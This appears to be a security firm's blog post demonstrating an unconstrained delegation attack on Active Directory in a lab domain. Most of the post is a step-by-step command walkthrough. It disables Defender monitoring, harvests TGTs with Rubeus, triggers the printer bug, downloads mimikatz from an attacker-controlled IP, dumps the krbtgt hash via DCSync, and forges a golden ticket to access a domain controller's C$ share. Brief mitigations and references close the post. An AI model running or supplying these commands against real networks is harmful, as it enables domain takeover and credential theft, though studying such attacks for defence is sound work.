Practical Demo of the Unconstrained Delegation Attack

There has been many publications out there explaining various ways to attack an unconstrained delegation. This research/post is to practically show how such misconfiguration can be exploited easily and effectively. To further understand this kind of attack, check out the resources at the bottom below.

Let’s get started:

To perform this kind of attack,

1. Gain access to a domain controller (DCB) in ForestB.
2. Monitor for logon event through LSA API with Rubeus.exe: Rubeus.exe.
3. Use a MS-RPRN.exe to trigger the “printer bug” against DCA.
4. Trigger the MS-RPRN “printer bug” against a domain controller (e.g. DCA) in ForestA.
5. Harvest a Ticket Granting Ticket (TGT) with Rubeus.exe.
6. Perform DCSYNC attack to retrieve the TGT credentials.
7. Forge a golden ticket.
8. Domain controller(DCA) in ForestA gets compromised.

Practical Demo:

checking the hostname

we can see we are now logged in to the DB-Server.

Find a computer on the domain that has unrestricted kerberos delegation property set using the command:

Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders

Error due to GET-ADComputer not being recognised

Lets try to install the Active Directory Module for PowerShell. The AD module is already installed on domain controllers on Windows Server but on member servers, you can add the module as a feature in Server Manager or using PowerShell command below:

get-windowsfeature | where name -like RSAT-AD-PowerShell | Install-WindowsFeature

Modules installed successfully

Now retry with the previous command to find a computer on the domain that has unrestricted kerberos delegation property:

Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders

2 servers found

We check if our server DB-SERVER has a TrustedForDelegation set to TRUE. If yes, we can start our attack

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

TrustedForDelegation set to TRUE

Attack time:

Have 2 shells (lets call that shell 1 and shell 2)opened so that you can run Rubeus.exe and MS-RPRN.exe simultaneously.

2 shells spawned

Disable real time AV monitoring from the shell with command:

Set-MpPreference -DisableRealtimeMonitoring $true

Upload MS-RPRN.exe and Rubeus.exe

uploading MS-RPRN AND Rubeus.exe

In shell on the left (port 2222) use Rubeus to harvest for TGTs every 3 seconds with the command:

Rubeus.exe harvest /interval:3

TGT Harvested

and in shell on the right (port 3333) use MS-RPRN to request the TGTs

c:\Users\Public\MS-RPRN.exe \\OPS-CHILDDC.operations.atomic.site \\DB-SERVER.operations.atomic.site

\\OPS-CHILDDC.operations.atomic.site = is the domain controller we want to compromise

\\DB-SERVER.operations.atomic.site = is the machine with delegation enabled that we control.

Trigger the MS-RPRN

remove spaces from captured hash ticket and save it into a file

hash file

pass the ticket with Rubeus.exe

Rubeus.exe ptt /ticket:hash

Let’s purge user kerberos ticket without Logoff with command:

klist

Purge User Kerberos Ticket without Logoff

To perform a DCSync attack, we must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.

Upload mimikatz to target. Remember we already disabled real-time monitoring from the start of our attack

powershell.exe Invoke-WebRequest -Uri ‘http://my-ip-here/mimikatz.exe' -Outfile mimikatz.exe

mimikatz.exe “privilege::debug” “lsadump::dcsync /user:OPERATIONS\krbtgt” exit

Krbtgt NTLM Hash and SID Extracted

let’s forge a golden ticket
kerberos::golden /User:administrator /domain:OPS-CHILDDC.operations.atomic.site /sid:S-1–5–21–3757735274–1965336150–1982876978 /krbtgt:8e2b8effbf6735b8fb5be206cb3dfead /startoffset:0 /endin:600 /renewmax:10080 /ptt

Forging a golden ticket

we can now view shared directories on our target domain controller

dir \\OPS-CHILDDC.operations.atomic.site\C$

share directory(\C$)

Mitigations from Unconstrained Delegation:

You should be able to turn on constraints to limit the SPNs delegation can work for.

Placing privileged users in the Protected Users group will prevent them from being used in delegation and keep their TGTs off these computers after they authenticate. The same goes for the Account, which is sensitive and cannot be a delegate option.

Resources: :

https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/

Not A Security Boundary: Breaking Forest Trusts

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

You can also check out our services on:: https://www.inveteckglobal.com/